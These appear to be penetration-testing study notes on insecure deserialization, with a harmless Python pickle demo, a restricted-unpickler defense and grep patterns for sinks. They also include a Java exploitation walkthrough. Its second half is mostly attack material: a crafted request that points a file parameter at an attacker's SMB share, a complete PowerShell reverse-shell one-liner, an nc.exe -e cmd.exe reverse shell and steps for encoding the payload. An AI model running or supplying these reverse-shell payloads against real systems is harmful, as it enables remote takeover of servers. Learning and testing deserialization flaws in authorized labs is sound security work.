Background
- Serialization converts an in-memory object or data structure into a byte stream (or a text format such as XML, JSON or YAML) that can be stored or sent over a network link and consumed later.
- Deserialization is the reverse: the receiver reconstructs the object from the stream. For example, a client can serialize an object and send it to a server over HTTP; the server deserializes it to get the object back.
- The security problem: if the stream is attacker-controlled and the deserializer instantiates whatever classes (or, in pickle's case, calls whatever callables) the stream names while rebuilding the object, the attacker chooses which code runs during reconstruction. That is what the searches below hunt for.
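Added example (not from the original notes): a constructed Python pickle stream that runs a command on load, the pickle.loads sink the grep patterns find, and a restricted unpickler that refuses any global outside an allowlist. The gadget calls os.system("echo ...") so it is harmless to run; the class name Evil, the allowlist contents and the benign data are assumptions made for the demo.

```python
import builtins
import io
import os
import pickle


# Constructed gadget: __reduce__ tells the unpickler "to rebuild this object,
# call os.system('echo ...')". The victim never needs to know this class; the
# instruction to call os.system is carried inside the bytes themselves.
class Evil:
    def __reduce__(self):
        return (os.system, ("echo deserialization executed a command",))


def make_payload() -> bytes:
    """What an attacker would send: the serialized gadget."""
    return pickle.dumps(Evil())


def benign_payload() -> bytes:
    """What the application expects: plain data built from builtin types (assumed shape)."""
    return pickle.dumps({"user": "alice", "roles": ["reader"], "ttl": 3600})


def unsafe_load(data: bytes):
    """The sink the grep patterns above find: pickle.loads on untrusted bytes.
    Returns whatever the attacker's callable returned (os.system -> exit status 0)."""
    return pickle.loads(data)


# Hardened variant: only resolve globals that are explicitly allowlisted.
# os.system (module 'posix' on Linux, 'nt' on Windows) is refused before the
# REDUCE opcode can call it.
SAFE_BUILTINS = {"range", "slice", "complex", "set", "frozenset"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def safe_load(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_blocked(data: bytes) -> bool:
    """True if the restricted loader refuses the stream before running anything."""
    try:
        safe_load(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    print("restricted loader, benign data:", safe_load(benign_payload()))
    print("restricted loader blocks gadget:", is_blocked(make_payload()))
    print("pickle.loads on gadget returned:", unsafe_load(make_payload()))
```

The allowlist approach is the one the Python docs recommend when pickle cannot be replaced; the real fix is to not accept pickle from untrusted peers at all and use a data-only format (JSON) with schema validation.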
Phar Deserialization: https://tantosec.com/blog/cve-2022-41343/
Grep
grep -riE '(marshal|pickle)\.(load|loads)[[:space:]]*\(' .   (load/loads are the sinks; dumps only produces data)
grep -riE 'yaml\.(load|unsafe_load)[[:space:]]*\(' .   (yaml.load is only safe with Loader=yaml.SafeLoader; yaml.safe_load is fine)
grep -r 'new ObjectInputStream' .
grep -rE '\.read(Object|External|Resolve)[[:space:]]*\(' .
grep -riE 'deserialize<[^>]+>[[:space:]]*\(' .   (.NET generic Deserialize<T>( calls)
grep -rE 'unserialize[[:space:]]*\(.*\$' .
.NET (C#)
BinaryFormatter class (deprecated; Microsoft documents it as unsafe on any untrusted input)
XmlSerializer class (serializes public properties and fields only; exploitable when the attacker controls the Type passed to its constructor, e.g. a type name taken from the request)
https://github.com/pwntester/ysoserial.net
Java
Search for:
+ readObject
+ Serializable
Resources
- https://github.com/frohoff/ysoserial
- https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#java-native-serialization-binary
- https://www.baeldung.com/java-deserialization-vulnerabilities
Only classes that implement java.io.Serializable (or Externalizable) can be deserialized by ObjectInputStream; gadget chains are therefore built from such classes already present on the target's classpath (see the cheat sheet above).
Exploitation (Java)
- Search code base for readObject or Serializable (e.g.
java.util.HashMap today = (java.util.HashMap)ois.readObject();)
- Find request location:
POST /servlet/CustomFieldsFeedServlet?customFieldObject=\\\\192.168.119.135\\AWAE\\exploit HTTP/1.1
Host: 192.168.135.113:8443
Cookie: JSESSIONID_APM_9090=DD2EA485CD9594E5E6013D1DC3123987; testcookie=; am_username=; am_check=
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
Content-Length: 0
- customFieldObject is used directly as a file name, and the file it names is what ends up in the ObjectInputStream whose readObject() call we found, so controlling the path means controlling the serialized bytes:
fileName = request.getParameter("customFieldObject");
- On Windows a file name can be a UNC path, so pointing the parameter at an SMB share we host makes the server fetch our serialized object (e.g. a ysoserial-generated one) from that share.
- Create the share (the share name must match the one in the UNC path; share names are case-insensitive):
python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support awae ~/AWAE/Share
- Use cmd.exe + nc.exe OR powershell.exe payload:
$client = New-Object System.Net.Sockets.TCPClient('192.168.119.120',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
cmd.exe /c \\\\192.168.119.135\\awae\\nc.exe 192.168.119.135 9000 -e cmd.exe (nc.exe is served from the same share: cp /usr/share/windows-binaries/nc.exe ~/AWAE/Share/; start the listener with nc -lvnp 9000 first)
- Encode the PowerShell payload: -EncodedCommand takes base64 of the UTF-16LE script, so the quotes, pipes and braces of the one-liner never have to survive cmd.exe or the gadget chain's argument handling (shell.txt holds the one-liner above):
iconv -f ASCII -t UTF-16LE shell.txt | base64 | tr -d "\n"
powershell -EncodedCommand [result_for_iconv]